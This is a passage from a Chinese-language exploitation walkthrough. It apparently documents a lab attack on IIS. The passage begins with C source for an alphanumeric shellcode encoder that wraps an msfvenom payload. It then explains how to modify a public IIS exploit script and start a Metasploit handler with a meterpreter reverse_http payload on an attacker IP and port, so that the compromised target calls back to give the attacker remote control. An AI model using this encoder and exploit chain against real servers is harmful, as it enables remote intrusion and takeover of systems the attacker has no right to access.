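                         : "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
  }
  else 
  {
    valid_chars = spaces ? " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                         : "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  }
  alphabet_len = strlen(valid_chars); // hoisted: the original recomputed this per step

  // Find the decoder whose id matches BASEADDRESS; the tables end in a
  // { NULL, NULL } sentinel, so the loop cannot run off the end.
  for (i = 0; decoders[options][i].id != NULL; i++) 
  {
    if (str_ieq(baseaddress, decoders[options][i].id)) {
      break;
    }
  }
  if (decoders[options][i].id == NULL) 
  {
    fprintf(stderr, "%s: 無法識別的BASEADDRESS選項 ‘%s'\n"
                    "使用 '%s %s%s--sources' 獲取一串 BASEADDRESS 選項.\n",
                    argv[0], baseaddress, argv[0],
                    uppercase ? "--uppercase " : "",
                    unicode ? "--unicode " : "");
    exit(EXIT_FAILURE);
  }
  printf("%s", decoders[options][i].code);

  // Encode and output the payload. sizeof(evil) counts the string literal's
  // implicit '\0' terminator, which is not part of the pasted bytes; the
  // original loop encoded that extra zero byte as well.
  for (size_t j = 0; j < sizeof(evil) - 1; j++)
  {
    unsigned int input = (unsigned char)evil[j]; // unsigned: char may be signed
    int A = (input & 0xf0) >> 4;
    int B = input & 0x0f;
    int C, D, E, F;
    int ef, cd;

    F = B;
    // E is arbitrary as long as EF is a valid character
    ef = pick_char(valid_chars, alphabet_len, F);
    if (ef < 0) {
      fprintf(stderr, "%s: internal error: no alphabet character with low nibble %d\n",
              argv[0], F);
      exit(EXIT_FAILURE);
    }
    E = ef >> 4;
    // normal code uses xor, unicode-proof uses ADD.
    D = unicode ? (A - E) & 0x0f : (A ^ E);
    // C is arbitrary as long as CD is a valid character
    cd = pick_char(valid_chars, alphabet_len, D);
    if (cd < 0) {
      fprintf(stderr, "%s: internal error: no alphabet character with low nibble %d\n",
              argv[0], D);
      exit(EXIT_FAILURE);
    }
    C = cd >> 4;
    printf("%c%c", (C << 4) + D, (E << 4) + F);
  }

  printf("A%s", nonewline ? "" : "\n"); // Terminating "A"
  return EXIT_SUCCESS;
}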

複製剛剛用msfvenom命令所生成的shellcode到.c文件中的如下位置:

由於kali中的gcc編譯出錯,提示缺少頭文件,我在攻擊機2中使用gcc編譯:

最後生成exe文件


在cmd下使用:

使用--help獲取幫助


使用--upercase--unicode ESI

修改原poc(地址:https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py):


回到攻擊機1:

在Kali中打開msf做監聽:

useexploit/multi/handler

setpayload windows/meterpreter/reverse_http

setLHOST 192.168.114.140

setLPORT 5555

exploit-j  在計劃任務下進行滲透攻擊(攻擊將在後臺進行)

再回到攻擊機2:

執行修改後的python腳本

執行後會回連Kali攻擊機 192.168.114.140的5555端口:



最後可以結合metasploit終端命令進一步操作:

參考地址:http://blog.csdn.net/mickeymouse1928/article/details/71107769
